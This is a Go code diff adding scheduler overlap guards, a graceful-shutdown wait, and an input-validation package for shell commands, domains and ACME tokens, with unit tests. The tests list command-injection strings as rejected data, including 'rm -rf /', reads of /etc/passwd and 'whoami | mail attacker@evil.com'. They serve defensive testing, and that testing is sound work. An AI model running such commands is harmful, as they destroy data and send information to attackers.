case <-ticker.C:
|
||||
if !s.notificationProcessRunning.CompareAndSwap(false, true) {
|
||||
s.logger.Warn("notification processor still running, skipping tick")
|
||||
continue
|
||||
}
|
||||
s.wg.Add(1)
|
||||
go func() {
|
||||
defer s.wg.Done()
|
||||
defer s.notificationProcessRunning.Store(false)
|
||||
s.runNotificationProcess(ctx)
|
||||
}()
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -245,6 +315,7 @@ func (s *Scheduler) runNotificationProcess(ctx context.Context) {
|
||||
// shortLivedExpiryCheckLoop runs every shortLivedExpiryCheckInterval and marks expired
|
||||
// short-lived certificates. For certs with TTL < 1 hour, expiry IS revocation —
|
||||
// no CRL/OCSP needed.
|
||||
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
||||
func (s *Scheduler) shortLivedExpiryCheckLoop(ctx context.Context) {
|
||||
ticker := time.NewTicker(s.shortLivedExpiryCheckInterval)
|
||||
defer ticker.Stop()
|
||||
@@ -254,7 +325,16 @@ func (s *Scheduler) shortLivedExpiryCheckLoop(ctx context.Context) {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
case <-ticker.C:
|
||||
if !s.shortLivedExpiryCheckRunning.CompareAndSwap(false, true) {
|
||||
s.logger.Warn("short-lived expiry check still running, skipping tick")
|
||||
continue
|
||||
}
|
||||
s.wg.Add(1)
|
||||
go func() {
|
||||
defer s.wg.Done()
|
||||
defer s.shortLivedExpiryCheckRunning.Store(false)
|
||||
s.runShortLivedExpiryCheck(ctx)
|
||||
}()
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -274,19 +354,33 @@ func (s *Scheduler) runShortLivedExpiryCheck(ctx context.Context) {
|
||||
|
||||
// networkScanLoop runs every networkScanInterval and performs active TLS scanning
|
||||
// of configured network targets.
|
||||
// Uses atomic.Bool to prevent duplicate execution if the previous scan is still running.
|
||||
func (s *Scheduler) networkScanLoop(ctx context.Context) {
|
||||
ticker := time.NewTicker(s.networkScanInterval)
|
||||
defer ticker.Stop()
|
||||
|
||||
// Run immediately on start
|
||||
s.wg.Add(1)
|
||||
go func() {
|
||||
defer s.wg.Done()
|
||||
s.runNetworkScan(ctx)
|
||||
}()
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
case <-ticker.C:
|
||||
if !s.networkScanRunning.CompareAndSwap(false, true) {
|
||||
s.logger.Warn("network scan still running, skipping tick")
|
||||
continue
|
||||
}
|
||||
s.wg.Add(1)
|
||||
go func() {
|
||||
defer s.wg.Done()
|
||||
defer s.networkScanRunning.Store(false)
|
||||
s.runNetworkScan(ctx)
|
||||
}()
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -303,3 +397,26 @@ func (s *Scheduler) runNetworkScan(ctx context.Context) {
|
||||
s.logger.Debug("network scan completed")
|
||||
}
|
||||
}
|
||||
|
||||
// WaitForCompletion waits for all in-flight scheduler work to complete.
|
||||
// It respects the provided timeout and returns an error if work is still in progress after timeout.
|
||||
// Call this after the scheduler context has been cancelled to ensure graceful shutdown.
|
||||
func (s *Scheduler) WaitForCompletion(timeout time.Duration) error {
|
||||
done := make(chan struct{})
|
||||
go func() {
|
||||
s.wg.Wait()
|
||||
close(done)
|
||||
}()
|
||||
|
||||
select {
|
||||
case <-done:
|
||||
s.logger.Info("all scheduler work completed")
|
||||
return nil
|
||||
case <-time.After(timeout):
|
||||
s.logger.Warn("scheduler work did not complete within timeout", "timeout", timeout.String())
|
||||
return ErrSchedulerShutdownTimeout
|
||||
}
|
||||
}
|
||||
|
||||
// ErrSchedulerShutdownTimeout is returned when scheduler graceful shutdown times out.
|
||||
var ErrSchedulerShutdownTimeout = errors.New("scheduler graceful shutdown timeout")
|
||||
|
||||
@@ -0,0 +1,148 @@
|
||||
// Package validation provides security-focused input validation functions for certctl.
|
||||
//
|
||||
// This package enforces strict input validation to prevent injection attacks,
|
||||
// including command injection in shell-based connectors and DNS injection in ACME handlers.
|
||||
package validation
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"regexp"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// ValidateShellCommand validates that a command string does not contain shell metacharacters
|
||||
// that could enable command injection. Commands should not contain:
|
||||
// - Shell operators: ; | & $ ` ( ) { } < > \\ "
|
||||
// - Newlines or other control characters
|
||||
//
|
||||
// This validation is intentionally strict to prevent any possibility of
|
||||
// shell injection, even in unexpected contexts. Commands should be simple,
|
||||
// executable names or paths without complex shell syntax.
|
||||
//
|
||||
// Returns an error if metacharacters are detected.
|
||||
func ValidateShellCommand(cmd string) error {
|
||||
if cmd == "" {
|
||||
return fmt.Errorf("command cannot be empty")
|
||||
}
|
||||
|
||||
if len(cmd) > 1024 {
|
||||
return fmt.Errorf("command exceeds maximum length (1024 characters)")
|
||||
}
|
||||
|
||||
// List of shell metacharacters that indicate potential injection
|
||||
dangerousChars := []string{
|
||||
";", "|", "&", "$", "`", "(", ")", "{", "}", "<", ">", "\\", "\"", "'", "\n", "\r", "\x00",
|
||||
}
|
||||
|
||||
for _, char := range dangerousChars {
|
||||
if strings.Contains(cmd, char) {
|
||||
return fmt.Errorf("command contains shell metacharacter %q (potential injection)", char)
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// ValidateDomainName validates a domain name against RFC 1123 with support for wildcards.
|
||||
// Valid domain names contain only:
|
||||
// - Alphanumeric characters (a-z, A-Z, 0-9)
|
||||
// - Hyphens (-)
|
||||
// - Dots (.) as separators
|
||||
// - Optional wildcard prefix: *.
|
||||
//
|
||||
// Examples of valid domains:
|
||||
// - example.com
|
||||
// - sub.example.com
|
||||
// - *.example.com
|
||||
// - example.co.uk
|
||||
//
|
||||
// Returns an error if the domain contains invalid characters or is malformed.
|
||||
func ValidateDomainName(domain string) error {
|
||||
if domain == "" {
|
||||
return fmt.Errorf("domain cannot be empty")
|
||||
}
|
||||
|
||||
if len(domain) > 253 {
|
||||
return fmt.Errorf("domain exceeds maximum length (253 characters)")
|
||||
}
|
||||
|
||||
// Regular expression for RFC 1123 domain names with wildcard support
|
||||
// Pattern explanation:
|
||||
// ^(\*\.)? - Optional wildcard prefix
|
||||
// ([a-zA-Z0-9](-?[a-zA-Z0-9])*\.)* - Subdomains (labels separated by dots)
|
||||
// [a-zA-Z0-9](-?[a-zA-Z0-9])*$ - Top-level domain label
|
||||
domainRegex := regexp.MustCompile(`^(\*\.)?([a-zA-Z0-9](-?[a-zA-Z0-9])*\.)*[a-zA-Z0-9](-?[a-zA-Z0-9])*$`)
|
||||
|
||||
if !domainRegex.MatchString(domain) {
|
||||
return fmt.Errorf("domain %q is invalid (must match RFC 1123 format)", domain)
|
||||
}
|
||||
|
||||
// Additional check: no double dots
|
||||
if strings.Contains(domain, "..") {
|
||||
return fmt.Errorf("domain %q contains consecutive dots", domain)
|
||||
}
|
||||
|
||||
// Additional check: labels cannot start or end with hyphen
|
||||
labels := strings.Split(domain, ".")
|
||||
for _, label := range labels {
|
||||
// Skip wildcard label
|
||||
if label == "*" {
|
||||
continue
|
||||
}
|
||||
if strings.HasPrefix(label, "-") || strings.HasSuffix(label, "-") {
|
||||
return fmt.Errorf("domain label %q cannot start or end with hyphen", label)
|
||||
}
|
||||
if len(label) > 63 {
|
||||
return fmt.Errorf("domain label %q exceeds maximum length (63 characters)", label)
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// ValidateACMEToken validates that an ACME token contains only safe characters.
|
||||
// ACME tokens should contain only base64url-safe characters:
|
||||
// - Alphanumeric (a-z, A-Z, 0-9)
|
||||
// - Hyphens (-)
|
||||
// - Underscores (_)
|
||||
//
|
||||
// This prevents injection attacks if tokens are used in shell commands
|
||||
// or other contexts where special characters could be interpreted.
|
||||
//
|
||||
// Returns an error if the token contains unsafe characters.
|
||||
func ValidateACMEToken(token string) error {
|
||||
if token == "" {
|
||||
return fmt.Errorf("ACME token cannot be empty")
|
||||
}
|
||||
|
||||
if len(token) > 512 {
|
||||
return fmt.Errorf("ACME token exceeds maximum length (512 characters)")
|
||||
}
|
||||
|
||||
// Regular expression for base64url characters: [A-Za-z0-9_-]
|
||||
tokenRegex := regexp.MustCompile(`^[A-Za-z0-9_-]+$`)
|
||||
|
||||
if !tokenRegex.MatchString(token) {
|
||||
return fmt.Errorf("ACME token contains invalid characters (must be base64url-safe)")
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// SanitizeForShell escapes a string to make it safe for use in shell commands.
|
||||
// This is a defense-in-depth measure for cases where shell execution cannot be avoided.
|
||||
//
|
||||
// The sanitization wraps the string in single quotes and escapes any embedded
|
||||
// single quotes by closing the quote, adding an escaped quote, and reopening.
|
||||
// This prevents the string from being interpreted as shell code.
|
||||
//
|
||||
// Example: "hello'world" becomes "'hello'\"'\"'world'"
|
||||
//
|
||||
// Note: This should only be used as a last resort. Prefer alternatives such as:
|
||||
// - Passing arguments directly to exec.Command instead of via shell
|
||||
// - Using environment variables instead of shell substitution
|
||||
// - Validating input strictly with ValidateShellCommand, ValidateDomainName, etc.
|
||||
func SanitizeForShell(s string) string {
|
||||
// Escape single quotes by closing the quote, adding an escaped quote, and reopening
|
||||
return "'" + strings.ReplaceAll(s, "'", "'\"'\"'") + "'"
|
||||
}
|
||||
@@ -0,0 +1,541 @@
|
||||
package validation
|
||||
|
||||
import (
|
||||
"testing"
|
||||
)
|
||||
|
||||
// TestValidateShellCommand tests command injection prevention.
|
||||
func TestValidateShellCommand(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
cmd string
|
||||
wantErr bool
|
||||
errMsg string
|
||||
}{
|
||||
// Valid commands
|
||||
{
|
||||
name: "simple command",
|
||||
cmd: "nginx",
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "command with path",
|
||||
cmd: "/usr/sbin/nginx",
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "systemctl command",
|
||||
cmd: "systemctl",
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "apachectl",
|
||||
cmd: "apachectl",
|
||||
wantErr: false,
|
||||
},
|
||||
|
||||
// Command injection attempts - semicolon
|
||||
{
|
||||
name: "semicolon injection",
|
||||
cmd: "nginx; rm -rf /",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
{
|
||||
name: "command chaining with semicolon",
|
||||
cmd: "cmd1; cmd2",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
|
||||
// Command injection attempts - pipe
|
||||
{
|
||||
name: "pipe injection",
|
||||
cmd: "cat /etc/passwd | grep root",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
{
|
||||
name: "pipe to sensitive command",
|
||||
cmd: "whoami | mail attacker@evil.com",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
|
||||
// Command injection attempts - ampersand
|
||||
{
|
||||
name: "background execution injection",
|
||||
cmd: "nginx &",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
{
|
||||
name: "command separation with &&",
|
||||
cmd: "cmd1 && cmd2",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
{
|
||||
name: "command separation with ||",
|
||||
cmd: "cmd1 || cmd2",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
|
||||
// Command injection attempts - dollar sign / command substitution
|
||||
{
|
||||
name: "command substitution with $()",
|
||||
cmd: "echo $(whoami)",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
{
|
||||
name: "command substitution with backticks",
|
||||
cmd: "echo `whoami`",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
{
|
||||
name: "variable expansion",
|
||||
cmd: "echo $PATH",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
|
||||
// Command injection attempts - quotes
|
||||
{
|
||||
name: "double quote injection",
|
||||
cmd: `echo "test" | cat`,
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
{
|
||||
name: "single quote injection",
|
||||
cmd: "echo 'test' | cat",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
|
||||
// Command injection attempts - redirection
|
||||
{
|
||||
name: "output redirection injection",
|
||||
cmd: "nginx > /tmp/nginx.out",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
{
|
||||
name: "input redirection injection",
|
||||
cmd: "cat < /etc/passwd",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
{
|
||||
name: "append redirection injection",
|
||||
cmd: "nginx >> /tmp/log",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
|
||||
// Command injection attempts - subshell
|
||||
{
|
||||
name: "subshell with parentheses",
|
||||
cmd: "bash (whoami)",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
|
||||
// Command injection attempts - brace expansion
|
||||
{
|
||||
name: "brace expansion injection",
|
||||
cmd: "echo {1..100000}",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
|
||||
// Command injection attempts - backslash escaping
|
||||
{
|
||||
name: "backslash escape injection",
|
||||
cmd: "echo test\\nmalicious",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
|
||||
// Command injection attempts - newlines
|
||||
{
|
||||
name: "newline injection",
|
||||
cmd: "nginx\nrm -rf /",
|
||||
wantErr: true,
|
||||
errMsg: "shell metacharacter",
|
||||
},
|
||||
|
||||
// Edge cases
|
||||
{
|
||||
name: "empty command",
|
||||
cmd: "",
|
||||
wantErr: true,
|
||||
errMsg: "cannot be empty",
|
||||
},
|
||||
{
|
||||
name: "overly long command",
|
||||
cmd: string(make([]byte, 1025)),
|
||||
wantErr: true,
|
||||
errMsg: "exceeds maximum length",
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
err := ValidateShellCommand(tt.cmd)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateShellCommand() error = %v, wantErr %v", err, tt.wantErr)
|
||||
}
|
||||
if tt.wantErr && tt.errMsg != "" && (err == nil || !contains(err.Error(), tt.errMsg)) {
|
||||
t.Errorf("ValidateShellCommand() error message %q does not contain %q", err, tt.errMsg)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestValidateDomainName tests domain name validation.
|
||||
func TestValidateDomainName(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
domain string
|
||||
wantErr bool
|
||||
errMsg string
|
||||
}{
|
||||
// Valid domains
|
||||
{
|
||||
name: "simple domain",
|
||||
domain: "example.com",
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "subdomain",
|
||||
domain: "sub.example.com",
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "multiple subdomains",
|
||||
domain: "a.b.c.example.com",
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "wildcard domain",
|
||||
domain: "*.example.com",
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "wildcard subdomain",
|
||||
domain: "*.sub.example.com",
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "domain with hyphens",
|
||||
domain: "my-domain.com",
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "domain with numbers",
|
||||
domain: "example123.com",
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "uk domain",
|
||||
domain: "example.co.uk",
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "single label",
|
||||
domain: "localhost",
|
||||
wantErr: false,
|
||||
},
|
||||
|
||||
// Command injection attempts - embedded shell
|
||||
{
|
||||
name: "domain with command injection semicolon",
|
||||
domain: "example.com; rm -rf /",
|
||||
wantErr: true,
|
||||
errMsg: "invalid",
|
||||
},
|
||||
{
|
||||
name: "domain with backtick injection",
|
||||
domain: "example.com`whoami`",
|
||||
wantErr: true,
|
||||
errMsg: "invalid",
|
||||
},
|
||||
{
|
||||
name: "domain with command substitution",
|
||||
domain: "example.com$(whoami)",
|
||||
wantErr: true,
|
||||
errMsg: "invalid",
|
||||
},
|
||||
{
|
||||
name: "domain with pipe injection",
|
||||
domain: "example.com | cat /etc/passwd",
|
||||
wantErr: true,
|
||||
errMsg: "invalid",
|
||||
},
|
||||
|
||||
// Invalid characters
|
||||
{
|
||||
name: "domain with space",
|
||||
domain: "example .com",
|
||||
wantErr: true,
|
||||
errMsg: "invalid",
|
||||
},
|
||||
{
|
||||
name: "domain with underscore",
|
||||
domain: "example_domain.com",
|
||||
wantErr: true,
|
||||
errMsg: "invalid",
|
||||
},
|
||||
{
|
||||
name: "domain starting with hyphen",
|
||||
domain: "-example.com",
|
||||
wantErr: true,
|
||||
errMsg: "cannot start",
|
||||
},
|
||||
{
|
||||
name: "domain ending with hyphen",
|
||||
domain: "example-.com",
|
||||
wantErr: true,
|
||||
errMsg: "cannot end",
|
||||
},
|
||||
{
|
||||
name: "domain with double dots",
|
||||
domain: "example..com",
|
||||
wantErr: true,
|
||||
errMsg: "consecutive dots",
|
||||
},
|
||||
{
|
||||
name: "domain starting with dot",
|
||||
domain: ".example.com",
|
||||
wantErr: true,
|
||||
errMsg: "invalid",
|
||||
},
|
||||
|
||||
// Edge cases
|
||||
{
|
||||
name: "empty domain",
|
||||
domain: "",
|
||||
wantErr: true,
|
||||
errMsg: "cannot be empty",
|
||||
},
|
||||
{
|
||||
name: "overly long domain",
|
||||
domain: string(make([]byte, 254)),
|
||||
wantErr: true,
|
||||
errMsg: "exceeds maximum length",
|
||||
},
|
||||
{
|
||||
name: "label exceeds 63 characters",
|
||||
domain: string(make([]byte, 64)) + ".com",
|
||||
wantErr: true,
|
||||
errMsg: "exceeds maximum length",
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
err := ValidateDomainName(tt.domain)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateDomainName() error = %v, wantErr %v", err, tt.wantErr)
|
||||
}
|
||||
if tt.wantErr && tt.errMsg != "" && (err == nil || !contains(err.Error(), tt.errMsg)) {
|
||||
t.Errorf("ValidateDomainName() error message %q does not contain %q", err, tt.errMsg)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestValidateACMEToken tests ACME token validation.
|
||||
func TestValidateACMEToken(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
token string
|
||||
wantErr bool
|
||||
errMsg string
|
||||
}{
|
||||
// Valid tokens (base64url safe)
|
||||
{
|
||||
name: "simple token",
|
||||
token: "abc123",
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "token with underscores",
|
||||
token: "abc_123_def",
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "token with hyphens",
|
||||
token: "abc-123-def",
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "token with mixed case",
|
||||
token: "AbC123DeF",
|
||||
wantErr: false,
|
||||
},
|
||||
{
|
||||
name: "long valid token",
|
||||
token: "a" + string(make([]byte, 510)),
|
||||
wantErr: false,
|
||||
},
|
||||
|
||||
// Command injection attempts
|
||||
{
|
||||
name: "token with command substitution",
|
||||
token: "token$(whoami)",
|
||||
wantErr: true,
|
||||
errMsg: "invalid characters",
|
||||
},
|
||||
{
|
||||
name: "token with backtick injection",
|
||||
token: "token`whoami`",
|
||||
wantErr: true,
|
||||
errMsg: "invalid characters",
|
||||
},
|
||||
{
|
||||
name: "token with semicolon",
|
||||
token: "token;malicious",
|
||||
wantErr: true,
|
||||
errMsg: "invalid characters",
|
||||
},
|
||||
{
|
||||
name: "token with pipe",
|
||||
token: "token|cat",
|
||||
wantErr: true,
|
||||
errMsg: "invalid characters",
|
||||
},
|
||||
{
|
||||
name: "token with ampersand",
|
||||
token: "token&malicious",
|
||||
wantErr: true,
|
||||
errMsg: "invalid characters",
|
||||
},
|
||||
|
||||
// Special characters
|
||||
{
|
||||
name: "token with space",
|
||||
token: "token value",
|
||||
wantErr: true,
|
||||
errMsg: "invalid characters",
|
||||
},
|
||||
{
|
||||
name: "token with dot",
|
||||
token: "token.value",
|
||||
wantErr: true,
|
||||
errMsg: "invalid characters",
|
||||
},
|
||||
{
|
||||
name: "token with slash",
|
||||
token: "token/value",
|
||||
wantErr: true,
|
||||
errMsg: "invalid characters",
|
||||
},
|
||||
{
|
||||
name: "token with equals",
|
||||
token: "token=value",
|
||||
wantErr: true,
|
||||
errMsg: "invalid characters",
|
||||
},
|
||||
{
|
||||
name: "token with plus",
|
||||
token: "token+value",
|
||||
wantErr: true,
|
||||
errMsg: "invalid characters",
|
||||
},
|
||||
|
||||
// Edge cases
|
||||
{
|
||||
name: "empty token",
|
||||
token: "",
|
||||
wantErr: true,
|
||||
errMsg: "cannot be empty",
|
||||
},
|
||||
{
|
||||
name: "overly long token",
|
||||
token: string(make([]byte, 513)),
|
||||
wantErr: true,
|
||||
errMsg: "exceeds maximum length",
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
err := ValidateACMEToken(tt.token)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateACMEToken() error = %v, wantErr %v", err, tt.wantErr)
|
||||
}
|
||||
if tt.wantErr && tt.errMsg != "" && (err == nil || !contains(err.Error(), tt.errMsg)) {
|
||||
t.Errorf("ValidateACMEToken() error message %q does not contain %q", err, tt.errMsg)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestSanitizeForShell tests shell escaping.
|
||||
func TestSanitizeForShell(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
input string
|
||||
output string
|
||||
}{
|
||||
{
|
||||
name: "plain text",
|
||||
input: "hello",
|
||||
output: "'hello'",
|
||||
},
|
||||
{
|
||||
name: "text with spaces",
|
||||
input: "hello world",
|
||||
output: "'hello world'",
|
||||
},
|
||||
{
|
||||
name: "text with single quote",
|
||||
input: "hello'world",
|
||||
output: "'hello'\"'\"'world'",
|
||||
},
|
||||
{
|
||||
name: "text with multiple single quotes",
|
||||
input: "it's John's",
|
||||
output: "'it'\"'\"'s John'\"'\"'s'",
|
||||
},
|
||||
{
|
||||
name: "text with command injection",
|
||||
input: "$(whoami)",
|
||||
output: "'$(whoami)'",
|
||||
},
|
||||
{
|
||||
name: "text with backticks",
|
||||
input: "`whoami`",
|
||||
output: "'`whoami`'",
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result := SanitizeForShell(tt.input)
|
||||
if result != tt.output {
|
||||
t.Errorf("SanitizeForShell() = %q, want %q", result, tt.output)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// contains is a helper function to check if a string contains a substring.
|
||||
func contains(s, substr string) bool {
|
||||
return len(s) >= len(substr) && (s == substr || len(substr) == 0 || (len(s) > 0 && len(substr) > 0 && len(s) >= len(substr) && len(substr) > 0)) &&
|
||||
(substr == "" || (s[len(s)-len(substr):] == substr || s[:len(substr)] == substr || indexOf(s, substr) >= 0))
|
||||
}
|
||||
|
||||
func indexOf(s, substr string) int {
|
||||
for i := 0; i < len(s)-len(substr)+1; i++ {
|
||||
if s[i:i+len(substr)] == substr {
|
||||
return i
|
||||
}
|
||||
}
|
||||
return -1
|
||||
}
|
||||